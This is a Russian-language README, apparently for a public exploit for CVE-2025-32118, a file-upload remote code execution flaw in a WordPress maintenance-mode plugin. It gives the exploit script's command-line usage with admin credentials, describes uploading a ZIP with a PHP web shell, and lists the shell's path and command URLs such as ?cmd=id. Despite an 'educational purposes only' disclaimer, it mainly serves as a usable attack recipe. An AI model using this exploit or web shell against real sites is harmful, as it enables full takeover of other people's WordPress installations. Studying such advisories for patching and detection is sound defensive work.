
Плагин WordPress CMP – Coming Soon & Maintenance <= 4.1.13 - уязвимость удалённого выполнения кода (RCE)
🔍 Название: WordPress CMP – Coming Soon & Maintenance плагин <= 4.1.13 - удаленное выполнение кода (RCE)
🗓️ Опубликовано: 2025-04-04
🔐 CWE: CWE-434 - Неограниченная загрузка файла опасного типа
📊 CVSS: 9.1 (КРИТИЧЕСКИЙ) — CVSS:3.1/AV:N/AC:L/PR:H/UI:N/S:C/C:H/I:H/A:H
Критическая уязвимость удаленного выполнения кода (RCE) существует в плагине CMP – Coming Soon & Maintenance для WordPress (<= 4.1.13).
Эта ошибка позволяет аутентифицированному пользователю с правами администратора загружать вредоносные ZIP-файлы, содержащие исполняемые PHP-оболочки, что приводит к полной компрометации сайта.
<= 4.1.13)python3 CVE-2025-32118.py -u http://target-site.com/wordpress -un admin -p password
usage: CVE-2025-32118.py [-h] -u URL -un USERNAME -p PASSWORD
Exploit For CVE-2025-32118 : By Nxploited - Khaled Alenazi
options:
-h, --help show this help message and exit
-u, --url URL Base URL of WordPress site
-un, --username USERNAME Admin username
-p, --password PASSWORD Admin password
| Flag | Описание |
|---|---|
-u | Базовый URL сайта WordPress |
-un | имя пользователя |
-p | пароль |
nonce для запроса загрузки.style.css (допустимый формат темы)nxploitedshell.php (RCE-пейлоад)?cmd=whoami.После успешной загрузки оболочка будет расположена по адресу:
/wp-content/plugins/cmp-premium-themes/nxploitedshell/nxploitedshell.php
Проверьте ее с помощью:
http://target-site.com/wp-content/plugins/cmp-premium-themes/nxploitedshell/nxploitedshell.php?cmd=id
Этот эксплойт предназначен только для образовательных целей.
Несанкционированное использование этого кода против систем, которые вам не принадлежат, незаконно и неэтично.
Nxploited | Khaled Alenazi